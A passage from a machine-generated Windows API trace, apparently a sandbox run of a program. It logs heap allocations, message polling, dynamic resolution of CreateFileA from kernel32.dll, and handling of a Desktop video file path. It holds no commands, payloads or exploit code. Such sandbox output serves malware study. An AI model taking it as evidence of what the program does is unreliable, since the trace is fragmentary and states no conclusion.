hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0167.841] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0167.841] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.841] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0167.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0167.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0167.841] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0167.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0167.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0167.842] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0167.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0167.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0167.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0167.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0167.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0167.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0167.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0167.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0167.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0167.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0167.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0167.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0167.846] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0167.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0167.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.849] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0167.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0167.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba0c0 [0167.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba0c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0167.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.850] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0167.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0167.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0167.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba0c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0167.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.850] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0167.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0167.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0167.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0167.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0167.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0167.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0167.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0167.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3c) returned 0x8db0a8 [0167.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", cchWideChar=60, lpMultiByteStr=0x8db0a8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", lpUsedDefaultChar=0x0) returned 60 [0167.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | 